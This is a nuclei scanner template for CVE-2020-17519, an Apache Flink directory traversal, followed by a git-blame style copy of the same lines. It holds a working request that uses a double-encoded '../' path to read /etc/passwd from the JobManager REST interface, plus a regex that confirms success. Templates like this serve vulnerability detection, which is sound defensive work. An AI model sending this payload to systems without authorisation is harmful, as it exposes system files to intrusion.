nuclei-templates/cves/2020/CVE-2020-17519.yaml

id: CVE-2020-17519

info:
  name: Apache Flink directory traversal
  author: pd-team
  severity: high
  description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
  reference: https://github.com/B1anda0/CVE-2020-17519
  tags: cve,cve2020,apache,traversal

requests:
  - method: GET
    path:
      - "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
adding CVE-2020-17519 2021-01-06 07:08:41 +00:00			`id: CVE-2020-17519`

			`info:`
			`name: Apache Flink directory traversal`
			`author: pd-team`
			`severity: high`
			`description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`reference: https://github.com/B1anda0/CVE-2020-17519`
			`tags: cve,cve2020,apache,traversal`
adding CVE-2020-17519 2021-01-06 07:08:41 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"`
			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0:"`
			`part: body`